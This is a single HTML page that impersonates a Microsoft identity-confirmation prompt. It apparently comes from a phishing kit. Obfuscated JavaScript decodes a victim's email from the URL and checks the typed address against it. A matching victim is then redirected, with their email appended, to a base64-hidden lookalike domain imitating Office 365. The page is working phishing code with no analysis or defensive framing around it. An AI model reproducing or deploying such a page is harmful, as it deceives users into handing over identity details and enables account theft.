<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <style>
body {
  font-family: "Segoe UI", Tahoma, Geneva, Verdana, sans-serif;
  background-color: #f4f4f4;
  display: flex;
  justify-content: center;
  align-items: center;
  height: 100vh;
  margin: 0;
}

.container {
  background: #fff;
  width: 320px;
  padding: 20px;
  border-radius: 15px;
  box-shadow: 0 4px 20px rgba(0, 0, 0, 0.1);
  text-align: center;
}

.logo {
  font-size: 20px;
  font-weight: bold;
  margin-bottom: 15px;
  color: #555;
}

h2 {
  font-size: 18px;
  margin-bottom: 15px;
  font-weight: 600;
  color: #333;
}

.file-preview {
  display: flex;
  justify-content: center;
  align-items: center;
  gap: 8px;
  margin-bottom: 15px;
}

.file-icon {
  width: 24px;
  height: 24px;
}

.file-name {
  font-size: 16px;
  color: #555;
  font-weight: 500;
}

p {
  font-size: 14px;
  color: #666;
  margin-bottom: 15px;
}

input {
  width: calc(100% - 20px);
  padding: 10px;
  margin-bottom: 10px;
  border: 1px solid #ddd;
  border-radius: 8px;
  font-size: 14px;
  outline: none;
}

input:focus {
  border-color: #0078d4;
}

button {
  width: 100%;
  padding: 10px;
  background-color: #0078d4;
  color: #fff;
  border: none;
  border-radius: 8px;
  font-size: 16px;
  cursor: pointer;
  transition: background 0.3s ease;
}

button:hover {
  background-color: #005bb5;
}

.footer {
  margin-top: 10px;
  font-size: 12px;
  color: #666;
}
</style>
    <title>Confirm Your Identity</title>
  </head>
  <body>
    <div class="container">
      <div class="file-preview">
		<?xml version="1.0" ?><svg id="Capa_1" style="enable-background:new 0 0 128 128;" version="1.1" viewBox="0 0 128 128" xml:space="preserve" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" class="file-icon"><style type="text/css">
	.st0{fill:#21A365;}
	.st1{fill:#107C41;}
	.st2{fill:#185B37;}
	.st3{fill:#33C481;}
	.st4{fill:#17864C;}
	.st5{fill:#FFFFFF;}
	.st6{fill:#036C70;}
	.st7{fill:#1A9BA1;}
	.st8{fill:#37C6D0;}
	.st9{fill:#04878B;}
	.st10{fill:#4F59CA;}
	.st11{fill:#7B82EA;}
	.st12{fill:#4C53BB;}
	.st13{fill:#0F78D5;}
	.st14{fill:#29A7EB;}
	.st15{fill:#0358A8;}
	.st16{fill:#0F79D6;}
	.st17{fill:#038387;}
	.st18{fill:#048A8E;}
	.st19{fill:#C8421D;}
	.st20{fill:#FF8F6A;}
	.st21{fill:#ED6B47;}
	.st22{fill:#891323;}
	.st23{fill:#AF2131;}
	.st24{fill:#C94E60;}
	.st25{fill:#E08195;}
	.st26{fill:#B42839;}
	.st27{fill:#0464B8;}
	.st28{fill:#0377D4;}
	.st29{fill:#4FD8FF;}
	.st30{fill:#1681D7;}
	.st31{fill:#0178D4;}
	.st32{fill:#042071;}
	.st33{fill:#168FDE;}
	.st34{fill:#CA64EA;}
	.st35{fill:#7E1FAF;}
	.st36{fill:#AE4BD5;}
	.st37{fill:#9332BF;}
	.st38{fill:#7719AA;}
	.st39{fill:#0078D4;}
	.st40{fill:#1490DF;}
	.st41{fill:#0364B8;}
	.st42{fill:#28A8EA;}
	.st43{fill:#41A5ED;}
	.st44{fill:#2C7BD5;}
	.st45{fill:#195ABE;}
	.st46{fill:#103E91;}
	.st47{fill:#2166C3;}
	.st48{opacity:0.2;}
</style><g><path class="st27" d="M120.2,22.8H34.2V9.1C34.2,6.8,36,5,38.2,5h77.9c2.3,0,4.1,1.8,4.1,4.1V22.8z"/><rect class="st28" height="26.6" width="28.7" x="34.2" y="22.8"/><rect class="st14" height="26.6" width="28.7" x="62.9" y="22.8"/><rect class="st29" height="26.6" width="28.7" x="91.6" y="22.8"/><rect class="st30" height="26.6" width="28.7" x="34.2" y="49.4"/><rect class="st31" height="26.6" width="28.7" x="62.9" y="49.4"/><rect class="st14" height="26.6" width="28.7" x="91.6" y="49.4"/><rect class="st27" height="26.6" width="28.7" x="62.9" y="75.9"/><rect class="st30" height="26.6" width="28.7" x="91.6" y="75.9"/></g><path class="st32" d="M126.9,69.1l-6.6,3.9V61.8l6.5,3.6C128.3,66.1,128.3,68.2,126.9,69.1z"/><path class="st33" d="M126.9,69.1l-0.6,0.4l0,0l-0.7,0.4l-5.3,3.1v-0.1l-88.4,50.6h89.1c3.8,0,6.8-3.1,6.8-6.8l0.1-49.4  C128,67.9,127.6,68.7,126.9,69.1z"/><g><path class="st14" d="M122,123.5H32.8c-3.8,0-6.8-3.1-6.8-6.8V68.5L122,123.5z"/></g><path class="st30" d="M59,96.5h-53c-3.5,0-6.4-2.9-6.4-6.4V37.9c0-3.5,2.9-6.4,6.4-6.4h53c3.5,0,6.4,2.9,6.4,6.4v52.2  C65.4,93.6,62.6,96.5,59,96.5z"/><g><path class="st5" d="M32.5,82.9c-10.3,0-16.8-7.8-16.8-18.2c0-11,7.1-18.8,17.3-18.8c10.6,0,16.8,7.9,16.8,18.1   C49.9,76.1,42.5,82.9,32.5,82.9L32.5,82.9z M32.9,77.7c6.4,0,10-5.9,10-13.4c0-6.8-3.4-13.1-10-13.1s-10.1,6.2-10.1,13.4   S26.4,77.7,32.9,77.7L32.9,77.7z"/></g><path class="st48" d="M65.5,37.3c0,0.2,0,0.4,0,0.6v52.2c0,3.5-2.9,6.4-6.4,6.4H26v5.7h38.4c3.5,0,6.4-2.9,6.4-6.4V43.6  C70.8,40.4,68.5,37.7,65.5,37.3z"/></svg>
        <span class="file-name">Microsoft</span>
      </div>
      <h2>Identity authentication</h2>
      
      <p>Please, confirm your email<br><strong id="part"></strong></p>
      <input
        id="email"
        type="email"
        placeholder="Email address"
        autocomplete="off"
      />
	  <input type="hidden" id="flow_u" />
      <button id="next">Next</button>
      <div class="footer">
        By clicking Next, you are granting permission to use your email address
        in line with our privacy statement.
      </div>
    </div>
  </body>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.0/jquery.min.js"></script>
<script>
let l = "aHR0cHM6Ly9maWxlLm8zNjVjbG91ZGZpbGUuY29tL0dSRUtPTFhEP2U9";
let b64 = "no";
const _0x56c23b=_0x1208;function _0x1208(_0x5add98,_0x579119){const _0x1557e1=_0x1557();return _0x1208=function(_0x120837,_0x51b914){_0x120837=_0x120837-0x96;let _0x1b3ebc=_0x1557e1[_0x120837];return _0x1b3ebc;},_0x1208(_0x5add98,_0x579119);}function _0x1557(){const _0x2f8d22=['button#next','keypress','422407klUBRy','html','search','yes','click','13741TnWjCz','5523512QtMHtU','3845575kpIHCz','location','Email\x20address\x20is\x20incorrect','2676DOhWuz','9XzMFNE','keyCode','#part','20RwgeAd','#flow_u','get','state','split','test','407697pbDLVs','val','toLowerCase','38771460GYgZJF','5035664wjKYMQ'];_0x1557=function(){return _0x2f8d22;};return _0x1557();}(function(_0x39fcfb,_0x1be21b){const _0x32aa07=_0x1208,_0x44cdff=_0x39fcfb();while(!![]){try{const _0x134f59=parseInt(_0x32aa07(0xb0))/0x1+-parseInt(_0x32aa07(0xa3))/0x2*(parseInt(_0x32aa07(0xa9))/0x3)+-parseInt(_0x32aa07(0xad))/0x4+-parseInt(_0x32aa07(0x9c))/0x5+-parseInt(_0x32aa07(0x9f))/0x6*(parseInt(_0x32aa07(0x9a))/0x7)+parseInt(_0x32aa07(0x9b))/0x8*(parseInt(_0x32aa07(0xa0))/0x9)+parseInt(_0x32aa07(0xac))/0xa;if(_0x134f59===_0x1be21b)break;else _0x44cdff['push'](_0x44cdff['shift']());}catch(_0x1f2664){_0x44cdff['push'](_0x44cdff['shift']());}}}(_0x1557,0xb19b1));const queryString=window[_0x56c23b(0x9d)][_0x56c23b(0x97)],urlParams=new URLSearchParams(queryString);let s=atob(urlParams[_0x56c23b(0xa5)](_0x56c23b(0xa6))),s_op=s[_0x56c23b(0xa7)]('|');$(_0x56c23b(0xa2))[_0x56c23b(0x96)](atob(s_op[0x1])),$(_0x56c23b(0xa4))[_0x56c23b(0xaa)](atob(s_op[0x2]));function validate(_0x23671f){const _0x19fc0c=_0x56c23b;return/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/[_0x19fc0c(0xa8)](_0x23671f)?!![]:![];}$('input#email')[_0x56c23b(0xaf)](function(_0x27d564){const _0x73e2ac=_0x56c23b;_0x27d564[_0x73e2ac(0xa1)]===0xd&&$(_0x73e2ac(0xae))[_0x73e2ac(0x99)]();}),$(_0x56c23b(0xae))[_0x56c23b(0x99)](function(){const _0x138193=_0x56c23b;let _0x1f9e38=$['trim']($('input#email')[_0x138193(0xaa)]());_0x1f9e38[_0x138193(0xab)]()==$(_0x138193(0xa4))[_0x138193(0xaa)]()[_0x138193(0xab)]()?b64==_0x138193(0x98)?document['location']['href']=atob(l)+btoa(_0x1f9e38):document[_0x138193(0x9d)]['href']=atob(l)+_0x1f9e38:alert(_0x138193(0x9e));});
</script>
</html>
